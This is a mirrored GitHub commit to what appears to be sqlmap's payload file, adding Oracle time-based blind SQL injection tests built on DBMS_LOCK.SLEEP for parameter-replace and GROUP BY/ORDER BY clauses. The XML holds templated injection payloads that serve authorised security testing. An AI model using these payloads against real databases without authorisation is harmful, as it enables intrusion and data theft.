Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 9b0662d

Browse files
bdamelebdamele
committed
added new Oracle time-based payloads
1 parent 2d3a74a commit 9b0662d

1 file changed

Lines changed: 40 additions & 2 deletions

File tree

xml/payloads.xml

Lines changed: 40 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -3325,7 +3325,26 @@ Formats:
33253325
</test>
33263326

33273327
<test>
3328-
<title>Oracle time-based blind - Parameter replace</title>
3328+
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
3329+
<stype>5</stype>
3330+
<level>3</level>
3331+
<risk>0</risk>
3332+
<clause>1,3</clause>
3333+
<where>3</where>
3334+
<vector>(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</vector>
3335+
<request>
3336+
<payload>(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</payload>
3337+
</request>
3338+
<response>
3339+
<time>[SLEEPTIME]</time>
3340+
</response>
3341+
<details>
3342+
<dbms>Oracle</dbms>
3343+
</details>
3344+
</test>
3345+
3346+
<test>
3347+
<title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
33293348
<stype>5</stype>
33303349
<level>3</level>
33313350
<risk>1</risk>
@@ -3605,7 +3624,26 @@ Formats:
36053624
</test>
36063625

36073626
<test>
3608-
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
3627+
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
3628+
<stype>5</stype>
3629+
<level>3</level>
3630+
<risk>0</risk>
3631+
<clause>2,3</clause>
3632+
<where>1</where>
3633+
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END)</vector>
3634+
<request>
3635+
<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END)</payload>
3636+
</request>
3637+
<response>
3638+
<time>[SLEEPTIME]</time>
3639+
</response>
3640+
<details>
3641+
<dbms>Oracle</dbms>
3642+
</details>
3643+
</test>
3644+
3645+
<test>
3646+
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
36093647
<stype>5</stype>
36103648
<level>3</level>
36113649
<risk>1</risk>

0 commit comments

Comments
 (0)